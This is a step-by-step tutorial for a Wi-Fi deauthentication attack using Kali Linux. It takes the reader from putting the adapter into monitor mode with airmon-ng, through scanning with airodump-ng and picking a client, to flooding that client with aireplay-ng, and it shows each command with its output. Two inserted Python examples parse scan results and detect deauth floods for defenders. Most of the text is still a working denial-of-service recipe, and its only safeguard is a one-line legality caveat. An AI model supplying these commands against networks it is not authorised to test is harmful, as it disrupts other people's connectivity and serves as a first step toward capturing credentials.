Deauthentication Attack using Kali Linux

Step 1 - Checking your network interfaces with ifconfig and iwconfig

By typing ifconfig and hitting enter in your terminal you get the following output:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe59:1b51  prefixlen 64  scopeid 0x20<link>
ether 08:00:27:59:1b:51  txqueuelen 1000  (Ethernet)
RX packets 5  bytes 1360 (1.3 KiB)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 69  bytes 5690 (5.5 KiB)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
inet 127.0.0.1  netmask 255.0.0.0
inet6 ::1  prefixlen 128  scopeid 0x10<host>
loop  txqueuelen 1000  (Local Loopback)
RX packets 20  bytes 1116 (1.0 KiB)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 20  bytes 1116 (1.0 KiB)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
ether fa:30:3e:ca:dd:85  txqueuelen 1000  (Ethernet)
RX packets 0  bytes 0 (0.0 B)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 0  bytes 0 (0.0 B)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

In the eth0 section of my ifconfig output you can see inet 10.0.2.15; this is because I am running Kali Linux in a virtual machine that is attached to a NAT network. You can ignore that interface for now.

The only section that matters here is wlan0, which is the wireless adapter, and as you can see mine is not connected to any network. If it were, it would show an IP address, typically in the 192.168.x.x range (just to answer a common question in advance).

The next command is iwconfig. Type it into your terminal, hit enter, and boom:

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
Retry short limit:7   RTS thr:off   Fragment thr:off
Encryption key:off
Power Management:off

From this output we can see that the wireless card is in Managed mode, and we want it in Monitor mode. So let's do that.

Step 2 - Setting wireless adapter on Monitor mode with airmon-ng

By running airmon-ng start wlan0 (or whatever your adapter is called; it could be wlan1 or wlan2) you put the adapter into monitor mode! Note the warning in the output about NetworkManager, dhclient and wpa_supplicant: if monitor mode keeps dropping out, run airmon-ng check kill first, as the output suggests. Check out the output:

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
448 NetworkManager
525 dhclient
654 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
Retry short limit:7   RTS thr:off   Fragment thr:off
Power Management:off

Look at the iwconfig result above: Mode:Monitor, and the interface is now called wlan0mon! You are ready to go.

Step 3 - Searching for victims with airodump-ng

Execute the command airodump-ng wlan0mon on your terminal and start choosing targets.

Command output:

CH 12 ][ Elapsed: 6 s ][ 2020-09-02 15:41                                         

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

**:**:**:**:**:**  -85        2        1    0   6  130  WPA2 CCMP   PSK  ******911                 
**:**:**:**:**:**  -79        4        0    0  11   65  WPA2 CCMP   PSK  ******etwork                
50:C7:BF:DC:4C:E8  -45       18        0    0  11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8                
**:**:**:**:**:**  -74        5        0    0   1  270  WPA2 CCMP   PSK  ******D                 
**:**:**:**:**:**  -75        5        0    0   1  270  OPN              ******Fon                   
**:**:**:**:**:**  -79        6        0    0   6   65  WPA  CCMP   PSK  Win******9A84                
**:**:**:**:**:**  -82        2        2    0   2  270  WPA2 CCMP   PSK  ******4hu1                     
**:**:**:**:**:**  -81        4        8    0  13  135  WPA  CCMP   PSK  mp******i                      
**:**:**:**:**:**  -91        2        0    0   1  270  OPN              OTE******n                   
**:**:**:**:**:**  -92        3        1    0   1  270  WPA2 CCMP   PSK  Sp******e Sky     

The combination of BSSID and ESSID can help hackers find physical locations. 😁 Yep, that's a thing.
The command keeps running and monitoring nearby access points, but as soon as we find our target in the list we can hit ctrl+c to stop the monitoring process.

You will get a bunch of different access points with a lot of columns you may not understand yet! Let's break them down.

  • BSSID | MAC address of the access point. In the client section, a BSSID of “(not associated)” means that the client is not associated with any AP. In this unassociated state it is searching for an AP to connect to.
  • PWR | Signal level reported by the card. Its meaning depends on the driver, but the higher the signal, the closer you are to the AP or the station. If the BSSID PWR is -1, the driver doesn't support signal level reporting. If the PWR is -1 for a limited number of stations, then the packet came from the AP to the client but the client's transmissions are out of range for your card, meaning you are hearing only half of the conversation. If all clients have PWR -1, the driver doesn't support signal level reporting.
  • Beacons | Number of announcement packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far away.
  • # Data | Number of captured data packets (if WEP, unique IV count), including broadcast data packets.
  • #/s | Number of data packets per second, measured over the last 10 seconds.
  • CH | Channel number (taken from beacon packets).
    Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
  • MB | Maximum speed supported by the AP. If MB = 11, it's 802.11b; if MB = 22 it's 802.11b+; higher rates are 802.11g. A dot after the rate (e.g. 54.) indicates that short preamble is supported. An “e” following the MB value means the network has QoS enabled.
  • ENC | Encryption algorithm in use. OPN = no encryption, “WEP?” = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP is present.
  • CIPHER | The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater than 0. The standard states that the index can be 0-3 for 40-bit and should be 0 for 104-bit.
  • AUTH | The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).
  • ESSID | The wireless network name, the so-called “SSID”, which can be empty if SSID hiding is enabled. In that case airodump-ng will try to recover the SSID from probe responses and association requests.
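To show how these columns fit together, here is an added example (not code from the original post) that parses the airodump-ng AP table into records and flags the open, WEP and WPA/TKIP networks that someone auditing their own Wi-Fi would want to notice. The TP-LINK row is taken from the scan above; the other BSSIDs and ESSIDs are constructed for this example.

```python
"""Parse the airodump-ng access-point table (the layout shown above) into
records and flag the networks whose settings a defender should look at."""
import re

# Constructed sample in the airodump-ng layout: the TP-LINK row is from the
# scan above, the other BSSIDs and ESSIDs are made up for this example.
SAMPLE_SCAN = """\
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

50:C7:BF:DC:4C:E8  -45       18        0    0  11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8
02:11:22:33:44:55  -75        5        0    0   1  270  OPN              Example Fon
02:11:22:33:44:66  -79        6        0    0   6   65  WPA  TKIP   PSK  Win_Example
02:11:22:33:44:77  -92        3        1    0   1  270  WPA2 CCMP   PSK  Sp Example Sky
"""
MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}\s")

def parse_ap_table(text):
    """One dict per AP row; header, blank and station rows are skipped.
    ESSIDs may contain spaces and OPN rows have no CIPHER/AUTH columns, so
    the line is only split as far as the fixed columns go."""
    aps = []
    for line in text.splitlines():
        if "STATION" in line:          # the client table starts here
            break
        if not MAC_RE.match(line):
            continue
        fields = (line.split(None, 8) + [""])[:9]  # pad a hidden OPN ESSID
        if len(fields) < 9:            # not an AP row
            continue
        bssid, pwr, beacons, data, _per_s, ch, mb, enc, rest = fields
        if enc == "OPN":
            cipher, auth, essid = "", "", rest
        else:
            cipher, auth, essid = (rest.split(None, 2) + ["", "", ""])[:3]
        aps.append({"bssid": bssid, "pwr": int(pwr), "beacons": int(beacons),
                    "data": int(data), "channel": int(ch), "mb": mb, "enc": enc,
                    "cipher": cipher, "auth": auth, "essid": essid.strip()})
    return aps

def weak_networks(aps):
    """Return (essid, reason) for open/WEP networks and for WPA(1) or TKIP,
    which also rules out 802.11w protected management frames."""
    weak = []
    for ap in aps:
        if ap["enc"] in ("OPN", "WEP", "WEP?"):
            weak.append((ap["essid"], "open or WEP"))
        elif ap["enc"] == "WPA" or ap["cipher"] == "TKIP":
            weak.append((ap["essid"], "WPA/TKIP"))
    return weak
```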

I will be targeting my own AP, TP-LINK_AP_4CE8! You should understand that doing this to other APs is illegal. Unless you have permission, of course.

Step 4 - Specific Targeting for better information gathering

Now that we know what we need about our target, we have to find the devices connected to its network. To do that we run the following command.

The command structure is airodump-ng -d "target's BSSID" -c "target's channel number" "wireless adapter monitor mode name".
In our case the full command is:

airodump-ng -d 50:C7:BF:DC:4C:E8 -c 11 wlan0mon

Now we are monitoring SPECIFICALLY our target and not all nearby access points. We can also see that there are two devices currently on the network, one of which is my phone!

CH 11 ][ Elapsed: 1 min ][ 2020-09-02 15:59 ]                        

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

50:C7:BF:DC:4C:E8  -22  91      610      163    4  11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8            

BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               

50:C7:BF:DC:4C:E8  AC:3C:0B:36:BD:5B  -32    0e-24      0       12                                       
50:C7:BF:DC:4C:E8  E0:B5:2D:EA:18:A7  -58    1e-24      6      122  

Step 5 - Deauthenticating a device from the network // Kicking

The final command is:

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon

Command instructions:

  • -0 means deauthentication.
  • 0 is the number of deauths to send; 0 means send them continuously. You can send 10 instead if you only want the target to disconnect and reconnect.
  • -a 50:C7:BF:DC:4C:E8 is the MAC address of the access point we are targeting.
  • -c E0:B5:2D:EA:18:A7 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated.
  • wlan0mon is the interface name.

The command's continuous output:

16:14:41  Waiting for beacon frame (BSSID: 50:C7:BF:DC:4C:E8) on channel 11
16:14:42  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [99|67 ACKs]
16:14:43  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [61|59 ACKs]
16:14:43  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [25|48 ACKs]
16:14:44  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|72 ACKs]
16:14:45  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|57 ACKs]
16:14:45  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|65 ACKs]
16:14:45  Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:^C:A7] [ 0|10 ACKs]
...
...
[until we hit ctrl+c to stop it sending packets]
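From the defender's side, bursts like the ones above are easy to spot: a real AP sends the odd deauthentication or disassociation frame, not 64 per second. The following added example (not part of the original post) runs a sliding-window count over constructed management-frame records that mimic this capture, using the AP and client MACs shown above, and notes why 802.11w/PMF is the real fix.

```python
"""Flag deauthentication floods like the one above from a stream of 802.11
management-frame records: (timestamp, subtype, source, destination, reason)."""
from collections import deque, defaultdict

DEAUTH, DISASSOC = 12, 10         # 802.11 management frame subtypes
WINDOW_SECONDS = 2.0
THRESHOLD = 20                    # far above what a real AP sends in 2 s

# Constructed sample: two background frames a real AP might send (reason 4 =
# inactivity), then three 64-frame bursts with reason code 7, one per second,
# shaped like the aireplay-ng output above.
AP, CLIENT = "50:C7:BF:DC:4C:E8", "E0:B5:2D:EA:18:A7"
FRAMES = [(0.0, DEAUTH, AP, CLIENT, 4), (30.5, DISASSOC, AP, CLIENT, 8)]
FRAMES += [(100.0 + burst + i / 200.0, DEAUTH, AP, CLIENT, 7)
           for burst in range(3) for i in range(64)]

def detect_deauth_flood(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Sliding-window count of deauth/disassoc frames per claimed source.
    Returns one alert per source, recorded the first time it crosses the
    threshold. The source address is only a claim (the attacker spoofs the
    AP's BSSID), so detection is a signal; the fix is 802.11w/PMF, which
    authenticates these frames so spoofed ones are dropped by the client."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, subtype, src, _dst, reason in sorted(frames):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[src]
        q.append((ts, reason))
        while q and ts - q[0][0] > window:   # drop frames outside the window
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = {"first_seen": ts, "frames_in_window": len(q),
                           "reasons": sorted({r for _, r in q})}
    return alerts

if __name__ == "__main__":
    for src, info in detect_deauth_flood(FRAMES).items():
        print(f"deauth flood claiming to be from {src}: {info}")
```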
